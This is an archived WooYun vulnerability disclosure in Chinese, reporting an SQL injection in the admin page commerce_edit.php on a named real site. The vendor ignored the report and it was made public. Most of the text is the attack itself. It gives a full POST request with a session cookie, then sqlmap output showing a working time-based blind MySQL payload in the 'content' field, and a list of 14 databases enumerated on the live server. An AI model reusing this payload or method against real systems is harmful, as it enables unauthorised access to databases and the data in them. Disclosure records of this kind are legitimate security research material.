乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
POST /admin/commerce_edit.php?act=edit&cid=1&id=148 HTTP/1.1Content-Length: 717Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_FDXMVEUWCQX-Requested-With: XMLHttpRequestReferer: http://app.cmiea.orgCookie: PHPSESSID=eg4slo950hm99vviqn1caut931Host: app.cmiea.orgConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_MOTHTUWGQU-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="Submit"######-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="cid"1-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="content"*-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="id"148-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="name"############APP----########################-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="slt"1-------AcunetixBoundary_MOTHTUWGQU--
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: -------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="Submit"######-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="cid"1-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="content"' AND (SELECT * FROM (SELECT(SLEEP(5)))kmdT) AND 'vKJt'='vKJt-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="id"148-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="name"############APP----########################-------AcunetixBoundary_MOTHTUWGQUContent-Disposition: form-data; name="slt"1-------AcunetixBoundary_MOTHTUWGQU-----back-end DBMS: MySQL >= 5.0.0available databases [14]:[*] information_schema[*] jk_cacti[*] mysql[*] oms[*] ops[*] opsadmin[*] performance_schema[*] report[*] salt[*] saltadmin[*] test[*] www_cmiea_org[*] www_zs91_com[*] yan
危害等级:无影响厂商忽略
忽略时间:2015-11-28 11:56
漏洞Rank:4 (WooYun评价)
暂无